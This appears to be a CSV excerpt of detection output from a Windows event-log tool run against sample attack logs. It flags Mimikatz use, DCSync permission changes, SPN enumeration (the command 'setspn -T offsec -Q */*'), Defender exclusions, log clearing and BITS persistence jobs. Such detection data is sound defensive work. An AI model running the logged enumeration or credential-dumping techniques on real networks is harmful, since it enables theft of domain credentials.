20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat 
Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 
+09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions 
Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: 
""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual 
Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx +2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and 
Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx +2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: 
https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows 